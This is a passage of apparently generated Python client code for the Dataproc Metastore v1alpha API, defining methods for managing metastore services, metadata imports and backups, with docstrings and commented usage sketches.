request.service_id = service_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
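
    # Hedged usage sketch (placeholder IDs): the returned long-running
    # operation can be blocked on with result():
    #   op = client.create_service(
    #       parent="projects/my-proj/locations/us-central1",
    #       service=metastore.Service(),
    #       service_id="my-service",
    #   )
    #   service = op.result()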
def update_service(
self,
request: metastore.UpdateServiceRequest = None,
*,
service: metastore.Service = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates the parameters of a single service.
Args:
request (google.cloud.metastore_v1alpha.types.UpdateServiceRequest):
The request object. Request message for
[DataprocMetastore.UpdateService][google.cloud.metastore.v1alpha.DataprocMetastore.UpdateService].
service (google.cloud.metastore_v1alpha.types.Service):
Required. The metastore service to update. The server
only merges fields in the service if they are specified
in ``update_mask``.
The metastore service's ``name`` field is used to
identify the metastore service to be updated.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. A field mask used to specify the fields to be
overwritten in the metastore service resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.UpdateServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.UpdateServiceRequest):
request = metastore.UpdateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("service.name", request.service.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def delete_service(
self,
request: metastore.DeleteServiceRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single service.
Args:
request (google.cloud.metastore_v1alpha.types.DeleteServiceRequest):
The request object. Request message for
[DataprocMetastore.DeleteService][google.cloud.metastore.v1alpha.DataprocMetastore.DeleteService].
name (str):
Required. The relative resource name of the metastore
service to delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
                The result type for the operation will be
                :class:`google.protobuf.empty_pb2.Empty`, a generic empty
                message that you can re-use to avoid defining duplicated
                empty messages in your APIs. A typical example is to use
                it as the request or the response type of an API method.
                For instance:

                    service Foo {
                      rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty);
                    }

                The JSON representation for Empty is an empty JSON object {}.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.DeleteServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.DeleteServiceRequest):
request = metastore.DeleteServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
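
    # Hedged usage sketch (placeholder name): deletion is also long-running;
    #   client.delete_service(
    #       name="projects/my-proj/locations/us-central1/services/my-service"
    #   ).result()
    # resolves to google.protobuf.empty_pb2.Empty on success.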
def list_metadata_imports(
self,
request: metastore.ListMetadataImportsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMetadataImportsPager:
r"""Lists imports in a service.
Args:
request (google.cloud.metastore_v1alpha.types.ListMetadataImportsRequest):
The request object. Request message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1alpha.DataprocMetastore.ListMetadataImports].
parent (str):
Required. The relative resource name of the service
whose metadata imports to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListMetadataImportsPager:
Response message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1alpha.DataprocMetastore.ListMetadataImports].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListMetadataImportsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListMetadataImportsRequest):
request = metastore.ListMetadataImportsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_metadata_imports]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListMetadataImportsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def get_metadata_import(
self,
request: metastore.GetMetadataImportRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.MetadataImport:
r"""Gets details of a single import.
Args:
request (google.cloud.metastore_v1alpha.types.GetMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.GetMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.GetMetadataImport].
name (str):
Required. The relative resource name of the metadata
import to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports/{import_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.MetadataImport:
A metastore resource that imports
metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetMetadataImportRequest):
request = metastore.GetMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_metadata_import(
self,
request: metastore.CreateMetadataImportRequest = None,
*,
parent: str = None,
metadata_import: metastore.MetadataImport = None,
metadata_import_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new MetadataImport in a given project and
location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.CreateMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.CreateMetadataImport].
parent (str):
Required. The relative resource name of the service in
which to create a metastore import, in the following
form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import (google.cloud.metastore_v1alpha.types.MetadataImport):
Required. The metadata import to create. The ``name``
field is ignored. The ID of the created metadata import
must be provided in the request's ``metadata_import_id``
field.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import_id (str):
Required. The ID of the metadata
import, which is used as the final
component of the metadata import's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``metadata_import_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, metadata_import, metadata_import_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateMetadataImportRequest):
request = metastore.CreateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if metadata_import is not None:
request.metadata_import = metadata_import
if metadata_import_id is not None:
request.metadata_import_id = metadata_import_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
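
    # Hedged usage sketch (placeholder values), mirroring create_service:
    #   op = client.create_metadata_import(
    #       parent="projects/my-proj/locations/us-central1/services/my-service",
    #       metadata_import=metastore.MetadataImport(),
    #       metadata_import_id="my-import",
    #   )
    #   metadata_import = op.result()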
def update_metadata_import(
self,
request: metastore.UpdateMetadataImportRequest = None,
*,
metadata_import: metastore.MetadataImport = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a single import.
Only the description field of MetadataImport is
supported to be updated.
Args:
request (google.cloud.metastore_v1alpha.types.UpdateMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.UpdateMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.UpdateMetadataImport].
metadata_import (google.cloud.metastore_v1alpha.types.MetadataImport):
Required. The metadata import to update. The server only
merges fields in the import if they are specified in
``update_mask``.
The metadata import's ``name`` field is used to identify
                the metadata import to be updated.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. A field mask used to specify the fields to be
overwritten in the metadata import resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([metadata_import, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.UpdateMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.UpdateMetadataImportRequest):
request = metastore.UpdateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if metadata_import is not None:
request.metadata_import = metadata_import
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("metadata_import.name", request.metadata_import.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
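
    # Hedged usage sketch (hypothetical resource names; only ``description``
    # is documented as updatable, so the mask names just that field):
    #
    #     mask = field_mask_pb2.FieldMask(paths=["description"])
    #     operation = client.update_metadata_import(
    #         metadata_import=metastore.MetadataImport(
    #             name="projects/my-project/locations/us-central1/services/my-service/metadataImports/my-import",
    #             description="refreshed import",
    #         ),
    #         update_mask=mask,
    #     )
    #     result = operation.result()
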
def export_metadata(
self,
request: metastore.ExportMetadataRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Exports metadata from a service.
Args:
request (google.cloud.metastore_v1alpha.types.ExportMetadataRequest):
The request object. Request message for
[DataprocMetastore.ExportMetadata][google.cloud.metastore.v1alpha.DataprocMetastore.ExportMetadata].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataExport`
The details of a metadata export operation.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ExportMetadataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ExportMetadataRequest):
request = metastore.ExportMetadataRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.export_metadata]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataExport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
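
    # Hedged usage sketch. ``export_metadata`` exposes no flattened fields, so
    # a request object is built explicitly; the destination is a hypothetical
    # bucket and the ``destination_gcs_folder`` field name is an assumption
    # about the request type:
    #
    #     operation = client.export_metadata(
    #         request=metastore.ExportMetadataRequest(
    #             service="projects/my-project/locations/us-central1/services/my-service",
    #             destination_gcs_folder="gs://my-bucket/exports",
    #         )
    #     )
    #     export = operation.result()  # resolves to a MetadataExport
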
def restore_service(
self,
request: metastore.RestoreServiceRequest = None,
*,
service: str = None,
backup: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Restores a service from a backup.
Args:
request (google.cloud.metastore_v1alpha.types.RestoreServiceRequest):
The request object. Request message for
                [DataprocMetastore.RestoreService][google.cloud.metastore.v1alpha.DataprocMetastore.RestoreService].
service (str):
Required. The relative resource name of the metastore
                service to run the restore on, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}``
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (str):
Required. The relative resource name of the metastore
service backup to restore from, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}/backups/{backup_id}``
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Restore`
The details of a metadata restore operation.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, backup])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.RestoreServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.RestoreServiceRequest):
request = metastore.RestoreServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if backup is not None:
request.backup = backup
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.restore_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Restore,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
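
    # Hedged usage sketch (hypothetical resource names):
    #
    #     operation = client.restore_service(
    #         service="projects/my-project/locations/us-central1/services/my-service",
    #         backup="projects/my-project/locations/us-central1/services/my-service/backups/my-backup",
    #     )
    #     restore = operation.result()  # resolves to a Restore detail message
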
def list_backups(
self,
request: metastore.ListBackupsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListBackupsPager:
r"""Lists backups in a service.
Args:
request (google.cloud.metastore_v1alpha.types.ListBackupsRequest):
The request object. Request message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1alpha.DataprocMetastore.ListBackups].
parent (str):
Required. The relative resource name of the service
whose backups to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListBackupsPager:
Response message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1alpha.DataprocMetastore.ListBackups].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListBackupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListBackupsRequest):
request = metastore.ListBackupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_backups]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListBackupsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
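
    # Hedged usage sketch; the pager fetches further pages lazily during
    # iteration (hypothetical resource name):
    #
    #     parent = "projects/my-project/locations/us-central1/services/my-service"
    #     for backup in client.list_backups(parent=parent):
    #         print(backup.name)
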
def get_backup(
self,
request: metastore.GetBackupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Backup:
r"""Gets details of a single backup.
Args:
request (google.cloud.metastore_v1alpha.types.GetBackupRequest):
The request object. Request message for
[DataprocMetastore.GetBackup][google.cloud.metastore.v1alpha.DataprocMetastore.GetBackup].
name (str):
Required. The relative resource name of the backup to
retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.Backup:
The details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetBackupRequest):
request = metastore.GetBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
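
    # Hedged usage sketch (hypothetical resource name):
    #
    #     backup = client.get_backup(
    #         name="projects/my-project/locations/us-central1/services/my-service/backups/my-backup"
    #     )
    #     print(backup.name)
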
def create_backup(
self,
request: metastore.CreateBackupRequest = None,
*,
parent: str = None,
backup: metastore.Backup = None,
backup_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new Backup in a given project and location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateBackupRequest):
The request object. Request message for
[DataprocMetastore.CreateBackup][google.cloud.metastore.v1alpha.DataprocMetastore.CreateBackup].
parent (str):
Required. The relative resource name of the service in
                which to create a backup, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (google.cloud.metastore_v1alpha.types.Backup):
Required. The backup to create. The ``name`` field is
ignored. The ID of the created backup must be provided
in the request's ``backup_id`` field.
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup_id (str):
Required. The ID of the backup, which
is used as the final component of the
backup's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``backup_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Backup` The
details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, backup, backup_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateBackupRequest):
request = metastore.CreateBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if backup is not None:
request.backup = backup
if backup_id is not None:
request.backup_id = backup_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Backup,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
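
    # Hedged usage sketch; the backup's ``name`` field is ignored, per the
    # docstring above (hypothetical IDs, and ``description`` is assumed to be
    # a settable field of Backup):
    #
    #     operation = client.create_backup(
    #         parent="projects/my-project/locations/us-central1/services/my-service",
    #         backup=metastore.Backup(description="nightly snapshot"),
    #         backup_id="my-backup",
    #     )
    #     backup = operation.result()
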
def delete_backup(
self,
request: metastore.DeleteBackupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single backup.
Args:
request (google.cloud.metastore_v1alpha.types.DeleteBackupRequest):
The request object. Request message for
[DataprocMetastore.DeleteBackup][google.cloud.metastore.v1alpha.DataprocMetastore.DeleteBackup].
name (str):
Required. The relative resource name of the backup to
delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
                The result type for the operation will be
                :class:`google.protobuf.empty_pb2.Empty`, a generic empty
                message that you can re-use to avoid defining duplicated
                empty messages in your APIs. A typical example is to
                use it as the request or the response type of an API
                method. For instance::

                    service Foo {
                      rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty);
                    }

                The JSON representation for Empty is the empty JSON
                object ``{}``.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.DeleteBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
